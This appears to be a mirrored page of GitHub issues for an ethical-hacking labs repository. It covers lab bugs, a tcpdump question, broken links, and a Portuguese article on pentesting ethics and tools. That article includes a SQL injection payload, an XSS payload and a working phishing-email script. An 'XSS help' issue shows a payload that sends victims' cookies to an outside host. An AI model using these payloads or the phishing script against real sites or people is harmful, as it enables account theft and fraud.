Giter Club home page Giter Club logo

ethical-hacking-labs's People

Contributors

samsar4 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

ethical-hacking-labs's Issues

covert_tcp lab incorrect

I noticed your lab with covert_tcp seems to have a problem. When I use the tcpdump -nvvX port 8888 -i lo command its only monitoring the Loopback interface. In which case, it would find nothing anyway.
So I then switched it to use my eth0 interface and when I reran the lab, it picked up each packet. So it doesn't seem to hide anything. Unless I'm missing something here!

leftpad the numbers

it might be cool to have leftpadded numbers, so the repo and files on disk are in the correct order insted of 1,10,11,2

tcpdump在8080端口抓包和在非8080端口抓http协议包显示内容格式不同,为什么?

image
image

8080端口上抓到的http包,都解码后输出了比较整齐的http报文头;
8081端口上抓到的http包,都没有解码输出http报文;

除了端口,其他抓包参数都是相同的,为什么会有这样的差异?
tcpdump对8080端口,赋予了什么特殊的魔法?

tcpdump --version

tcpdump version 4.99.0
libpcap version 1.10.0 (with TPACKET_V3)
OpenSSL 1.1.1k 25 Mar 2021

cat /etc/issue

Debian GNU/Linux 11

hacking ethics article

Ética em Hacking e Testes de Penetração

Índice:

  1. Ética em Hacking e Conceitos Iniciais
    1.1. Plataformas Educacionais
    1.1.1. Coursera
    1.1.2. edX
    1.1.3. Khan Academy

  2. Penetration Testing com Ferramentas
    2.1. Exemplos de Ferramentas e Uso
    2.1.1. Wireshark
    2.1.2. Nmap
    2.1.3. Metasploit
    2.1.4. Burp Suite

  3. Linguagens de Programação em Hacking Ético
    3.1. Python
    3.2. Ruby
    3.3. JavaScript
    3.4. Bash Scripting
    3.5. C/C++
    3.6. Perl
    3.7. SQL
    3.8. Assembly

  4. Métodos de Testes de Penetração
    4.1. Teste de Vulnerabilidade
    4.2. Engenharia Social
    4.3. Teste de Red Team
    4.4. Teste de Aplicativo Web
    4.5. Teste de Infraestrutura
    4.6. Teste de Wi-Fi
    4.7. Teste de Segurança Física
    4.8. Teste de Penetração de Banco de Dados

  5. Exemplos de Scripts
    5.1. Script de Nmap
    5.2. Script Python para Teste de Vulnerabilidade
    5.3. Script de Engenharia Social - Phishing
    5.4. Script Bash para Teste de Rede
    5.5. Script Python para Teste de Cross-Site Scripting (XSS)

  6. Livros e Recursos para Ajudar nos Estudos
    6.1. "Hacking: The Art of Exploitation" por Jon Erickson
    6.2. "Metasploit: The Penetration Tester's Guide" por David Kennedy, Jim O'Gorman, Devon Kearns e Mati Aharoni
    6.3. "The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws" por Dafydd Stuttard e Marcus Pinto
    6.4. "Red Team Field Manual" por Ben Clark
    6.5. "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software" por Michael Sikorski e Andrew Honig
    6.6. "Wireshark Network Analysis" por Laura Chappell
    6.7. Artigos e Recursos Online

Ética em Hacking e Testes de Penetração

Ética em Hacking e Conceitos Iniciais:

princípios iniciais da ética em hacking:

  1. Coursera: O curso "Introdução à Segurança Cibernética" na Coursera abrange criptografia, autenticação e gerenciamento de riscos, usando exemplos práticos para proteger informações sensíveis em redes e sistemas.

  2. edX: No curso "Ética em Hacking e Testes de Invasão" do edX, aprenda práticas de hacking ético e a realizar testes de penetração legalmente, explorando cenários de ataques reais.

  3. Khan Academy: A Khan Academy oferece recursos sobre fundamentos de segurança cibernética e ética em hacking, abordando tipos de malware e como se proteger.

Penetration Testing com Ferramentas:

Agora, exploremos exemplos de ferramentas em testes de penetração:

  1. Wireshark: Ao conduzir testes em uma rede corporativa, use o Wireshark para capturar e analisar tráfego, detectando atividades suspeitas.

  2. Nmap: Ao testar um sistema de gerenciamento de servidores, varra a rede com o Nmap para identificar hosts, serviços e portas abertas.

  3. Metasploit: Avalie a segurança de um aplicativo web usando o Metasploit para explorar vulnerabilidades e informar os desenvolvedores sobre falhas.

  4. Burp Suite: Avalie a segurança de um site de comércio eletrônico com o Burp Suite para identificar vulnerabilidades como injeção de SQL ou cross-site scripting.

Linguagens de Programação em Hacking Ético:

Explore as linguagens usadas em hacking ético:

  1. Python: Ideal para automação, desenvolvimento de scripts e ferramentas de segurança, sendo usada em módulos do Metasploit.

  2. Ruby: Usada no Metasploit Framework, permitindo criar módulos de exploração personalizados.

  3. JavaScript: Além do desenvolvimento web, é usado para testes de segurança em aplicativos web, como cross-site scripting (XSS).

  4. Bash Scripting: Automatiza tarefas em sistemas Unix/Linux, como varreduras de rede.

  5. C/C++: Usados em exploits de baixo nível e ferramentas de alta performance, como partes do Metasploit.

  6. Perl: Ainda usada para automação e ferramentas de segurança.

  7. SQL: Fundamental para testes de segurança de bancos de dados, identificando vulnerabilidades como injeção de SQL.

  8. Assembly: Para exploits específicos e engenharia reversa.

Métodos de Testes de Penetração:

  1. Teste de Vulnerabilidade: Identifica falhas e vulnerabilidades para avaliar medidas de segurança.

  2. Engenharia Social: Explora a natureza humana para obter acesso não autorizado.

  3. Teste de Red Team: Simula ataques para identificar brechas e avaliar a equipe de defesa.

  4. Teste de Aplicativo Web: Avalia a segurança de sites, procurando vulnerabilidades como injeção de SQL.

  5. Teste de Infraestrutura: Avalia a segurança de redes e sistemas, identificando falhas de configuração.

  6. Teste de Wi-Fi: Avalia a segurança de redes sem fio, buscando brechas na criptografia.

  7. Teste de Segurança Física: Testa a resistência de medidas de segurança física.

  8. Teste de Penetração de Banco de Dados: Identifica vulnerabilidades em sistemas de gerenciamento de banco de dados.

Exemplos de Scripts:

  1. Exemplo de Script de Nmap:

    nmap -sS -p 1-100 192.168.1.1
    

    Nesse exemplo, o Nmap realiza uma varredura TCP SYN em todas as portas de 1 a 100 no endereço IP 192.168.1.1.

  2. Exemplo de Script Python para Teste de Vulnerabilidade:

    import requests
    
    url = "http://exemplo.com.br/vulneravel.php"
    payload = "'; DROP TABLE usuarios;--"
    
    response = requests.post(url, data={"username": payload, "password": "senha"})

    Este script Python simula uma injeção de SQL ao enviar um payload malicioso para um campo de entrada em um formulário web.

  3. Exemplo de Script de Engenharia Social - Phishing:

    import smtplib
    from email.mime.text import MIMEText
    
    sender_email = "[email protected]"
    receiver_email = "[email protected]"
    subject = "Importante: Atualize suas informações!"
    message = "Prezado usuário, solicitamos que atualize seus dados neste link: http://phishingsite.com/atualizacao"
    
    msg = MIMEText(message)
    msg['Subject'] = subject
    msg['From'] = sender_email
    msg['To'] = receiver_email
    
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(sender_email, "suasenha")
    server.sendmail(sender_email, [receiver_email], msg.as_string())
    server.quit()

    Este exemplo ilustra um script de phishing por e-mail que envia uma mensagem falsa para enganar o usuário e direcioná-lo a um site malicioso.

  4. Exemplo de Script Bash para Teste de Rede:

    #!/bin/bash
    
    echo "Iniciando varredura de rede..."
    nmap -sP 192.168.0.0/24
    echo "Varredura concluída."

    Este script Bash executa uma varredura de ping (ICMP) em todos os dispositivos na faixa de IP 192.168.0.0/24 para verificar quais estão online.

  5. Exemplo de Script Python para Teste de Cross-Site Scripting (XSS):

    import requests
    
    url = "http://exemplo.com.br/pagina.php"
    payload = "<script>alert('XSS');</script>"
    
    response = requests.post(url, data={"comentario": payload})

    Neste exemplo, um script Python envia um payload XSS como parte de um comentário para um site, demonstrando uma vulnerabilidade de XSS.

Livros e Recursos para Ajudar nos Estudos:

  1. "Hacking: The Art of Exploitation" por Jon Erickson - Este livro aborda tanto conceitos básicos quanto avançados de hacking ético, incluindo programação de exploits e análise de códigos maliciosos.

  2. "Metasploit: The Penetration Tester's Guide" por David Kennedy, Jim O'Gorman, Devon Kearns e Mati Aharoni - Um guia detalhado sobre como usar o Metasploit para testes de penetração e exploração de vulnerabilidades.

  3. "The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws" por Dafydd Stuttard e Marcus Pinto - Este livro é uma referência essencial para entender as vulnerabilidades em aplicativos da web e como explorá-las de maneira ética.

  4. "Red Team Field Manual" por Ben Clark - Um guia de referência compacto com comandos e procedimentos úteis para profissionais de segurança e pentesters.

  5. "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software" por Michael Sikorski e Andrew Honig - Este livro ensina técnicas de análise de malware, fornecendo insights sobre como identificar e entender códigos maliciosos.

  6. "Wireshark Network Analysis" por Laura Chappell - Um guia detalhado sobre o uso do Wireshark para análise de tráfego de rede e detecção de anomalias.

Artigos e Recursos Online:

  1. OWASP (Open Web Application Security Project) - Uma comunidade dedicada à segurança de aplicativos da web, oferecendo guias, ferramentas e recursos para identificar e mitigar vulnerabilidades.

  2. Hack The Box (HTB) - Uma plataforma online que oferece desafios de penetração em um ambiente seguro, permitindo que você desenvolva e teste suas habilidades de hacking ético.

  3. CVE Details - Um banco de dados de informações sobre vulnerabilidades de segurança conhecidas, que podem ajudar a entender as ameaças atuais.

  4. SecurityTube - Uma plataforma que oferece uma variedade de vídeos e cursos sobre hacking ético e segurança cibernética.

  5. Packet Storm - Um site de segurança que fornece informações sobre vulnerabilidades, exploits e ferramentas de segurança.

Broken Links

Module 6 Malware - Lab Using-njRAT has broken links unfortunately

hacking

I really love every step made in this wonderful tutorial

website

Hi, I am passionate to contribute some open source projects, as I am a react developer can I create a web app using next js for this project,
please feel free to contact me at [email protected]

XSS help

I'm doing an ethical hacking test, I tested an XSS payload : <script>alert("xss")</script> on a website, and the pop-up appears, so I want to collect user cookie

I created a getcookie.php file and a cookies.txt file and and I uploaded both files to a hosting server,
I placed the two files in the htdocs folder, which now contains index.html, getcookie.php and a cookies.txt

This is the getcookie.php file:

When I try this in the search box: : <script>document.location="http://website.com/getcookie.php?c="+document.cookie;</script>

I get this URL:
https://website2/search/?section=all&query=<script>document.location="http:SLASHSLASHwebsite.comSLASHgetcookie.php?c="+document.cookie;&path=SLASH

and I don't see any cookies in cookies.txt

What am I doing wrong, please? I've tried lot of payloads in the past 3 days but no results,
when I type http://website.com/getcookie.php in a new tab, I get the cookie but it's empty, I get this text : Cookie:

Thank you

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.